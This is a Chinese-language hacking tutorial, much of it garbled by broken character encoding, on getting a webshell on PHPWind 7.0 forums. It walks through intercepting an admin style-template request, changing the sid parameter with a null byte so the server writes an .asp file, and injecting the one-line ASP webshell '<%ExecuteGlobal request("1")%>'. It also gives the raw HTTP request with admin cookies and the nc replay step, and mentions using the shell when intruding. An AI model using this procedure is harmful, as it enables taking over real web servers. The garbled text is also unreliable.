phpwin7.0拿shell的方法

äºåä¸ææå,å¨å¥ä¾µä¸ä¸ªPHPWIND论åæ¶çææ,éç¨äºPHPWINDä¸è½ä¸ä¼ ,èç½ä¸çä¼ çä¸ç§æ¿SEHLLæ¹æ³é½æ æ,å¯ä»¥ä¸è¯,åºè¯¥ç®æ¯PHPWINDåå°çæ¼æ´
åå¤å·¥å·:winsockä¸å®¶ v0.6 betan1 ä¸åª;UE-32.EXEä¸åªï¼NC.EXEä¸åª,çµèä¸å°(åªè§ä¸å ç å¤´é£è¿ãããã)

å¼å·¥äºï¼é¦åæå¼winsock ç¶åå¯å¨IEï¼è¿å¥åå°ï¼ï¼åªä¸ªåå¨ä¸¢ç å¤´ãããï¼

è¿å¥é£æ ¼æ件>>>>é£æ ¼æ¨¡æ¿>>>>æ·»å é£æ ¼.å¨ç¬¬ä¸é¡¹ï¼æ­¤é£æ ¼å¨imageç®å½ä¸çæ件夹å称:å¡«TESTæFUCKCNNããç¶åææ交ã

ç¶åç¹ [è¿ å 继 ç»­ æ ä½] æ¾å°åææ°å»ºçé£æ ¼ï¼ç¹ç¼ç¼ï¼
è¿éå°±è¦è½®å°winsockåºåºäº...
æå¼IEè¿ç¨æåé便æ¹ç¹ä»ä¹,å¦ä¸é¢ç98%æ¹æ97%.è¿éå³é®çæ¯ææ°æ®åæä¸æ¥,å¶å®ç没æè°

ä¸å±äºæ¡æ°æ®å¦ä¸:
1:
POST /phpwind/upload/admin.php?adminjob=setstyles&verify=bb457aae& HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://x22222.h21.ttrr.com/phpwi ... n=edit&sid=test
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) ; .NET CLR 2.0.50727)
Host: x22222.h21.ttrr.com
Content-Length: 473
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: 9f9e2_lastpos=T3; 9f9e2_ol_offset=97; 9f9e2_threadlog=%2C2%2C; 9f9e2_winduser=C20FAgIEVABSV1RYUAQDVwICDVcAA1MDVwcGBwEFUgUABGg%3D; 9f9e2_ck_info=%2F%09; 9f9e2_lastvisit=7102%091208851845%09%2Fphpwind%2Fupload%2Fread.php%3Ftid%3D3; 9f9e2_ipfrom=32f09dc105198e55683b704b0f8fbc6b%09%B9%E3%B6%AB%CA%A1%0D; 9f9e2_readlog=%2C1%2C2%2C3%2C; 9f9e2_adskin=0; 9f9e2_cknum=CFZUCggDVABSDDtoA1ZRB1VTCQVUCgJVUwMGAQpXBgdcB1FWWwUHAgFWVlA%3D; 9f9e2_AdminUser=CFZUCggAXQVVBDsAVV4MWmgHWF0BBlUPUAZTDQZTBlIAVlcDXFIGVFNWAVFQUFADBTo%3D

2:
action=edit&step=3&sid=test&setting%5B0%5D=test&setting%5B1%5D=wind&setting%5B2%5D=1&setting%5B7%5D=97%25&setting%5B8%5D=98%25&setting%5B3%5D=%23fff&setting%5B4%5D=%232f5fa1&setting%5B5%5D=%23B6D9E3&setting%5B6%5D=%23D4EFF7&setting%5B9%5D=%2376BAC2&setting%5B10%5D=%2376BAC2&setting%5B11%5D=%23005681&setting%5B12%5D=%235495A0&setting%5B13%5D=%23F7F7F7&setting%5B14%5D=%23D6E8CB&setting%5B15%5D=%23659b28&setting%5B16%5D=%23ffffff&setting%5B17%5D=%23F4FBFF&setting%5B18%5D=
åå«æä»ä»¬å­ä¸ºa.txtåb.txt

éç¹å°äº,æ们æå¼b.txt,æ第ä¸ä¸ªåæ°sid=testæ¹ä¸ºtest.aspa,å¨æåçåæ°æ¹ä¸ºsetting%5B18%5D=%0D%0C%3C%25ExecuteGlobal+request%28%221%22%29%25%3Eç®åç¹å°±æ¯[å车符]<%ExecuteGlobal request("1")%>

å­ç,å¯ä»¥äº,ç¶åæ¥çä¸ä¸b.txtç大å°530å­è.å¥å¥æ¯ç»ä»ä½å¥½äº,åç»ä»å¸¦ä¸çç,

好,ç°å¨æ们æb.txtçå容å¤å¶å°a.txtçæä¸é¢,åç¨ue-32æå¼a.txt,æä¸é¢è¿è¡Content-Length: 473æ¹æContent-Length: 530,ç¶ååæ¢[å°åå­è¿å¶æ¨¡å¼]æåæä¿®æ¹ç第ä¸ä¸ªåæ°sid=test.aspaæ¹ä¸ºsid=test.asp ,注æ,è¿ä¸ª 为åå­è¿å¶ç00 .å­ç,

ç¨NC.EXEåé

OK,ç°å¨è®©æ们ä¸FTPççæ没æçæTEST.ASP(å½ç¶,å¦ææ¯å¥ä¾µçè¯å°±ç´æ¥ç¨ä¸å¥è¯å®¢æ·ç«¯å»è¿æ)

è¦è®°å¾ä½ çæçæ件å¨bbs.xxxxxxxxx.com/data/style/test.asp

æ»ç»:æ¼æ´äº§ççåå æ¯è·å¾ä¹ä»¥åçå¨ç½ä¸ä¼ æ¼æ´ä¸æ ·,没æè滤00è¿ä¸ªå­è,å½æ们æçææ件åæ°åé¢å ä¸00æ¶,phpwind就以为ç¨åºç»æ,ç¶åå°±ä¼ç´æ¥çææ们æ³è¦çasp.æå¾å¤äººé®,è½ä¸è½ç´æ¥çæPHPå¢,è¿ä¸ªæä¹ä¸ç´å¨è¯,ä½é½æ¯æ²¡æåæ³,å ä¸ºPHPä¼ææ们è¾å¥çä¸å¥è¯åå«å°åå¼å·éé¢,è¿æ ·æ们çä¸å¥è¯å°±ä¸è½æ§è¡äº,èASPåå¼å·ä¸å½±åæ们çæ§è¡,ç±äºæ¬äººä¸æPHP.æ以ä¸ç¥éæ没æå¶å®çåæ³,å¸ææ¬æ丢(å­æä¹æä¹æä¸åºæ¥)ç å¼ç.让é«ææ¥è§£å³è¿ä¸ªé®é¢